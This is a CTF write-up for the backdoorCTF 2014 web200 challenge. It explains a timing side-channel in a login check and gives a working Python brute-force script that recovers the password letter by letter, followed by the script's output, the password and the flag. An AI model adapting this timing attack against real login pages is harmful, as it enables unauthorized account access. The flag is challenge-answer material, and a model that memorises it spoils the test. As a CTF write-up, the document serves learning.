backdoorCTF 2014 WriteUp

This task is to retrieve the password to a login page.
In the source code we find a usleep(20000) which is executed when the checked letter of the input is correct.
To bruteforce the password we write a script which throws an exception if a given timeout is exceeded.

#!/usr/bin/env python
import urllib2
import string

alpha=string.letters+string.digits
url="http://backdoor.cognizance.org.in/problems/web200/submit.php?key="
time_offset=0.4
password=""

for i in range(5):
	t=time_offset+(i*0.2)
	for a in alpha:
		test_key=password+a*(5-len(password))
		try:
			r=urllib2.urlopen(url+test_key, timeout=t)
		except:
			if len(password)&lt;=i:
				password+=a
			print password
			break
r=urllib2.urlopen(url+password)
print r.read()

This way we can compute the complete password letter by letter.

./brute.py
Z
Z9
Z9A
Z9A9
Z9A9x

With the password Z9A9x we get the flag:
ee7528e19f87ba00b4b4c721b646a8a2

backdoorCTF 2014 WriteUp - web200